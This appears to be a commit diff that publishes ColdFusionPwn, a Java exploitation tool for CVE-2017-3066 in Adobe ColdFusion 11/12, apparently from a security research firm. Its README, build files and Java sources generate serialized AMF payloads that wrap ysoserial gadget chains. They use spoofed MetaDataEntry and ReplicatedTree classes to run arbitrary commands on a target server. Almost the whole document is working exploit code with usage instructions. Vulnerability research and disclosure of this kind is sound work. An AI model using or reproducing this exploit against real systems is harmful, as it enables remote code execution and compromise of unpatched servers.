Initial release

Author: matthiaskaiser

README.md

@@ -0,0 +1,27 @@
+# ColdFusionPwn
+Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12.
+
+## Description
+The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes.
+For details see our [blog post](https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html).
+
+## Install
+Get the latest version of [ysoserial](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar).
+Get ColdFusionPwn from [releases](https://github.com/codewhitesec/ColdFusionPwn/releases).
+
+## Usage
+```bash
+java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
+```
+```
+- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
+- [payload type]  ysoserial gadget payload 
+- [command]       command to be executed
+- [outfile]       output file for the generated payload
+```
+It's required to have ColdFusionPwn-0.0.1-SNAPSHOT-all.jar as first entry in the classpath, since the ApacheCommons BeanUtils library shipped with ysoserial is newer (and has a different serialversion uid).
+
+## Examples
+```bash
+java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
+```

pom.xml

@@ -0,0 +1,87 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>codewhitesec</groupId>
+    <artifactId>ColdFusionPwn</artifactId>
+    <version>0.0.1-SNAPSHOT</version>
+
+    <build>
+        <plugins>
+
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.7.0</version>
+                <configuration>
+                    <source>1.7</source>
+                    <target>1.7</target>
+                </configuration>
+            </plugin>
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <finalName>${project.artifactId}-${project.version}-all</finalName>
+                    <appendAssemblyId>false</appendAssemblyId>
+                    <archive>
+                        <manifest>
+                            <mainClass>com.codewhitesec.coldfusionpwn.ColdFusionPwner</mainClass>
+                        </manifest>
+                        <manifestEntries>
+                            <Class-Path>/</Class-Path>
+                        </manifestEntries>
+                    </archive>
+
+                    <descriptors>
+                        <descriptor>src/assembly/bin.xml</descriptor>
+                    </descriptors>
+
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>make-assembly</id>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>single</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.flex.blazeds</groupId>
+            <artifactId>flex-messaging-core</artifactId>
+            <version>4.7.3</version>
+            <exclusions>
+                <exclusion>
+                    <groupId>xalan</groupId>
+                    <artifactId>xalan</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+
+        <dependency>
+            <groupId>ysoserial</groupId>
+            <artifactId>ysoserial</artifactId>
+            <version>0.0.6-SNAPSHOT</version>
+            <scope>system</scope>
+            <systemPath>${ysoserial}</systemPath>
+            <!--<systemPath>/tmp/ysoserial-master-SNAPSHOT-all.jar</systemPath> -->
+            <type>jar</type>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.8.0</version>
+        </dependency>
+
+    </dependencies>
+
+
+</project>

src/assembly/bin.xml

@@ -0,0 +1,39 @@
+<assembly
+        xmlns="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.0"
+        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+        xsi:schemaLocation="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.0 http://maven.apache.org/xsd/assembly-1.1.0.xsd">
+    <id>jar-with-all-dependencies</id>
+    <formats>
+        <format>jar</format>
+    </formats>
+
+
+    <includeBaseDirectory>false</includeBaseDirectory>
+    <dependencySets>
+        <dependencySet>
+            <outputDirectory>/</outputDirectory>
+            <useProjectArtifact>true</useProjectArtifact>
+            <unpack>true</unpack>
+
+            <unpackOptions>
+                <excludes>
+                    <exclude>ysoserial/**</exclude>
+                    <exclude>META-INF/maven/ysoserial/**</exclude>
+                </excludes>
+            </unpackOptions>
+            <scope>runtime</scope>
+        </dependencySet>
+        <dependencySet>
+            <outputDirectory>/</outputDirectory>
+            <unpack>true</unpack>
+            <scope>system</scope>
+            <unpackOptions>
+                <excludes>
+                    <exclude>ysoserial/**</exclude>
+                    <exclude>META-INF/maven/ysoserial/**</exclude>
+                </excludes>
+            </unpackOptions>
+        </dependencySet>
+    </dependencySets>
+
+</assembly>

src/main/java/com/codewhitesec/coldfusionpwn/ColdFusionPwner.java

@@ -0,0 +1,83 @@
+package com.codewhitesec.coldfusionpwn;
+
+import flex.messaging.io.SerializationContext;
+import flex.messaging.io.amf.ActionMessage;
+import flex.messaging.io.amf.AmfMessageSerializer;
+import flex.messaging.io.amf.AmfTrace;
+import flex.messaging.io.amf.MessageBody;
+import org.apache.axis2.util.MetaDataEntry;
+import org.jgroups.blocks.ReplicatedTree;
+import ysoserial.payloads.ObjectPayload;
+
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.Serializable;
+
+public class ColdFusionPwner {
+
+    public static void main(String[] args) throws Exception {
+
+
+        if(args.length != 4){
+            printUsage();
+            System.exit(-1);
+        }
+
+        Object payload = null;
+        String method = args[0].trim();
+
+        Serializable gadget = genYsoSerialPayload(args[1],args[2]);
+
+        if(method.equals("-s")){
+
+            payload = new ReplicatedTree(gadget);
+
+        }else if(method.equals("-e")){
+
+            payload = new MetaDataEntry(gadget);
+
+        }else{
+            printUsage();
+            System.exit(-1);
+        }
+
+        genExploit(payload,args[3]);
+
+    }
+
+    private static void printUsage() {
+
+        System.err.println("Usage: java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:/path/to/ysoserial-master-SNAPSHOT-all.jar [-s|-e] [payload type] '[command to execute]' [outfile]");
+
+    }
+
+    public static Serializable genYsoSerialPayload(String payloadType, String command) throws Exception {
+
+        Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+
+        ObjectPayload payload = (ObjectPayload)payloadClass.newInstance();
+        Object object = payload.getObject(command);
+
+        return (Serializable) object;
+    }
+
+
+    public static void genExploit(Object payload,String file) throws IOException {
+
+        FileOutputStream fout = new FileOutputStream(file);
+        SerializationContext context = new SerializationContext();
+        AmfTrace trace = new AmfTrace();
+
+        AmfMessageSerializer seri = new AmfMessageSerializer();
+        seri.initialize(context, fout, trace);
+
+        ActionMessage message = new ActionMessage(3);
+        MessageBody body = new MessageBody();
+        body.setData(payload);
+        message.addBody(body);
+
+        seri.writeMessage(message);
+
+    }
+
+}

src/main/java/org/apache/axis2/util/MetaDataEntry.java

@@ -0,0 +1,40 @@
+package org.apache.axis2.util;
+
+import java.io.*;
+
+
+public class MetaDataEntry implements Externalizable {
+
+    private Object payload;
+    private static final long serialVersionUID = 8978361069526299875L;
+    private static final int REVISION_2 = 2;
+    private static final int revisionID = 2;
+
+    public MetaDataEntry(Object payload){
+        this.payload = payload;
+    }
+
+    public void writeExternal(ObjectOutput o) throws IOException {
+
+        ByteArrayOutputStream bout = new ByteArrayOutputStream();
+        ObjectOutputStream oout = new ObjectOutputStream(bout);
+        oout.writeObject(payload);
+        byte[] bytes = bout.toByteArray();
+
+        o.writeLong(serialVersionUID);
+        o.writeInt(2);
+        o.writeBoolean(true);
+        o.writeBoolean(false);
+        o.writeInt(bytes.length);
+        o.write(bytes);
+        o.writeObject(null);
+        o.writeObject(null);
+        o.writeObject(null);
+
+    }
+
+    public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {
+        // we don't care
+    }
+
+}

src/main/java/org/jgroups/blocks/ReplicatedTree.java

@@ -0,0 +1,31 @@
+package org.jgroups.blocks;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+
+public class ReplicatedTree {
+
+    private Object payload;
+    private byte[] state;
+
+    public ReplicatedTree(Object payload){
+        this.payload = payload;
+    }
+
+    public byte[] getState() throws IOException {
+
+        ByteArrayOutputStream stream = new ByteArrayOutputStream();
+        stream.write(2);
+
+        ObjectOutputStream oos = new ObjectOutputStream(stream);
+        oos.writeObject(payload);
+        state = stream.toByteArray();
+
+        return state;
+    }
+
+    public void setState(byte[] state) {
+        //we don't care
+    }
+}